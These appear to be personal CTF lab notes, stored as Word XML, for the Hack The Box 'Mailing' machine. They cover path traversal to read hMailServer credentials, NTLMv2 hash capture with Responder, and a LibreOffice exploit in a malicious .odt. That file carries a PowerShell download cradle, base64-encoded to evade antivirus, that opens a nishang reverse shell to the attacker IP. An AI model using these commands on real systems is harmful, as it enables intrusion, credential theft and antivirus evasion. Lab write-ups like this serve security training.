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A310868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D23B01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mailing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E3313C5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0A7EF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this lab, I obtain the perfect knowledge of how to create the hash safe from the windows antivirus activations and how we can go with CVEs vulnerabilities. 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3C03EEB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23B0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23B01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D23B01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23B01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D23B01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23B01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D23B0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23B01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425F4EEA" w:rsidR="00843DCE" w:rsidRDefault="0094708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 w:rsidR="00A46B7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain host name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4B8A5" w14:textId="71638874" w:rsidR="00A46B7A" w:rsidRDefault="00F16CD9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‘’ -p ‘’ - -shares = to check anonymous login is active or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF524E" w14:textId="28847443" w:rsidR="00A46B7A" w:rsidRDefault="00236E1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the website and we notice 3 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username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so note it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F70F8" w14:textId="4B5C5B72" w:rsidR="00C847F5" w:rsidRDefault="00C847F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exiftool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xx.pdf = to check all details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 pdf. Who create, when which format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2778E5E6" w14:textId="753A9CFC" w:rsidR="00C847F5" w:rsidRDefault="00EB2D1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wget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‘http://xxxxxdownalaod.php?file=xxx.pdf’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7AD5C" w14:textId="3CBB13CC" w:rsidR="00EB2D10" w:rsidRDefault="00EB2D1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start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download.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/file=xxx.pdf = we notice the types that who changes, who request, who visit and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E75AAD" w14:textId="2D11E15A" w:rsidR="00A46B7A" w:rsidRDefault="0023247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obtain request in burp suit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50724DE4" w14:textId="6516E265" w:rsidR="00232479" w:rsidRDefault="0023247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download.php?file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=xxx.pdf change it as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFDC022" w14:textId="6AAE875D" w:rsidR="00232479" w:rsidRDefault="0023247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download.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51B6AC70" w14:textId="304D68E5" w:rsidR="001D2FAC" w:rsidRDefault="0089032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../../../../../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sindows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/system32/license.rtf</w:t>
      </w:r>
      <w:r w:rsidR="001D2FAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain the details of license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312952D6" w14:textId="6F5A5AE6" w:rsidR="009C1B53" w:rsidRDefault="009C1B5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but we don’t what it. we did because of check it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5010023D" w14:textId="34B5E7F2" w:rsidR="009C1B53" w:rsidRDefault="009C1B5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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="310D5496" w14:textId="5926D00A" w:rsidR="00A54C42" w:rsidRDefault="00A54C4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hmailserver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configuration file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675DFB16" w14:textId="68AAB2EA" w:rsidR="00A54C42" w:rsidRDefault="00A54C4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we obtain it save to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hmailserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF2D3E" w14:textId="523E2267" w:rsidR="00A54C42" w:rsidRDefault="00A54C42" w:rsidP="00843DCE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../../..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Program%20Files%20(x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>86)\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hmailServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\Bin\hMailServer.ini</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002034EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0EA242" w14:textId="77777777" w:rsidR="00A46B7A" w:rsidRDefault="00A46B7A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10424299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obtain administrator password and MSSQLCE password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5901A47F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just go to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crackstation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paste that hash we obtain the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F108FD4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administrator -p paste = but we failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A7CE0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try with the users.txt what we till date obtain by website = still failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75457470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know that there has smtp server to try to authentication against that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490EF71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use tool called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swaks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="473E742D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swaks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-server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mailing.htb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-auth LOGIN - -auth-user </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E037D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>administrator@mailing.htb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 -auth-password paste - -quit-after AUTH = and we have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>authenticate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41FBD00B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go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cve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4690CD6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windows mail exploit 2024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xaitax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</w:p>
    <w:p w14:paraId="7D1E5B95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git clone it and vi it to remove &lt;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line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC6E6C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responder -I turn0 = to start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poising</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214F27C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into that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they mention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hwo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to use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7634D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cve.py - -server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mailing.htb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-port 587 - -username </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E037D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>administrator@mailing.htb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 -password paste - -sender </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00E037D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>administrator@mailing.htb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 -recipient </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00E037D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>maya@mailing.htb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“”\10.10.14.56\test\meeting” - -subject test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63A1EBF3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wait for 2 min and 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respose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 responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5BC5E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ntlmv2 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69783BFC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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mailing.ntlmv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 = paste it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A22A95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/>
        </w:rPr>
        <w:t>mailing.ntlmv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 /opt/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wordlis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C486F85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/>
        </w:rPr>
        <w:t>mailing.ntlmv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 - -show = we obtain the password = m4y4ngs4ri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB0F8B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maya -p paste </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0133F" w14:textId="77777777" w:rsidR="000A7EF8" w:rsidRDefault="000A7EF8" w:rsidP="000A7EF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 obtain user.txt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5C2DC30" w14:textId="65EBF910" w:rsidR="00843DCE" w:rsidRPr="002A255F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4D209B5D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“important documents”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5200A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gci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-force = to see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hidder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folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB16FF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don’t obtain anything and we cannot do anything with burp suit because of its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rootwww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\path which we obtain from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downloads.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="540DF5C0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Program Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36999AAC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Libreoffice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in it we notice 1 non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dll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file version.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF7CBF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type program\version.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF17112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openoffiec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7.4.0.1 exploit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elweth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588B9688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git clone it and into it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AB4D2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nishang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/shells/invoke-powershelltcponeline.ps1 shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197DF30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take the mail as 3 remove others and edit it as 10.10.14.56 with 9001 port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5A1ADE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create file named vi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credle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DC575BE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IEX(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New-Object Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).downloadString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(‘http://10.10.14.56:8000/shell.ps1’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B42AB40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safe side from antivirus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B09D0C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cat cradle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iconv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-t utf-16le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xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23953918" w14:textId="28BEBE05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 w:rsidRPr="000A7EF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cat cradle | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A7EF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iconv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A7EF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t utf-16le | base64 -w 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = copy it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC1700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cve.py -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powershell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-enc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paste_hash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’ - -output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exploit.odt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00CB2735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created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABC551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mv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exploit.odt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/www/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BD7C95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www = python3 -m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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64614265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023D1238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7BF0B154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\imp*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCFCC31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curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00E037D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.10.14.56:8000/exploit.odt -o </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00E037D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>exploit.od</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00E037D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>t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= it downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD95B20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means when someone open that file via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openoffice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 it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reach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back to us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2689C6F9" w14:textId="77777777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wait for 2 min and we obtain the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA30AF6" w14:textId="53B0FF42" w:rsidR="002A255F" w:rsidRDefault="002A255F" w:rsidP="002A255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are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local</w:t>
      </w:r>
      <w:r w:rsidR="005F3CBF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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483D5F18" w:rsidR="00A311DF" w:rsidRDefault="002A255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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidR="005F3CBF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dmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D546FD7" w14:textId="7575E692" w:rsidR="002A255F" w:rsidRPr="00843DCE" w:rsidRDefault="002A255F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so</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in desktop of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidR="005F3CBF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dmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we have root.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002A255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2306"/>
    <w:rsid w:val="00043A38"/>
    <w:rsid w:val="0007674E"/>
    <w:rsid w:val="000974D5"/>
    <w:rsid w:val="000A7EF8"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00134958"/>
    <w:rsid w:val="001505DA"/>
    <w:rsid w:val="001D2FAC"/>
    <w:rsid w:val="002034EB"/>
    <w:rsid w:val="00232479"/>
    <w:rsid w:val="00236E11"/>
    <w:rsid w:val="0025279D"/>
    <w:rsid w:val="002763BB"/>
    <w:rsid w:val="002A255F"/>
    <w:rsid w:val="002F7D86"/>
    <w:rsid w:val="003460E1"/>
    <w:rsid w:val="00354569"/>
    <w:rsid w:val="003C4060"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="0044066D"/>
    <w:rsid w:val="004E2E5A"/>
    <w:rsid w:val="005379EA"/>
    <w:rsid w:val="005A58E4"/>
    <w:rsid w:val="005F3CBF"/>
    <w:rsid w:val="0060110C"/>
    <w:rsid w:val="006048BA"/>
    <w:rsid w:val="006F35BF"/>
    <w:rsid w:val="00721956"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00890321"/>
    <w:rsid w:val="008E70FB"/>
    <w:rsid w:val="0094708B"/>
    <w:rsid w:val="009C1B53"/>
    <w:rsid w:val="009D11DA"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A46B7A"/>
    <w:rsid w:val="00A54C42"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B00008"/>
    <w:rsid w:val="00B07C56"/>
    <w:rsid w:val="00B20B3D"/>
    <w:rsid w:val="00BC60C4"/>
    <w:rsid w:val="00C71224"/>
    <w:rsid w:val="00C7715D"/>
    <w:rsid w:val="00C847F5"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D23B01"/>
    <w:rsid w:val="00E3544B"/>
    <w:rsid w:val="00E35F92"/>
    <w:rsid w:val="00EB2D10"/>
    <w:rsid w:val="00F16CD9"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FD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1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14.56:8000/exploit.odt%20-o%20exploit.od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aya@mailing.ht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nistrator@mailing.htb" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:administrator@mailing.htb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administrator@mailing.ht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48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-21T16:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>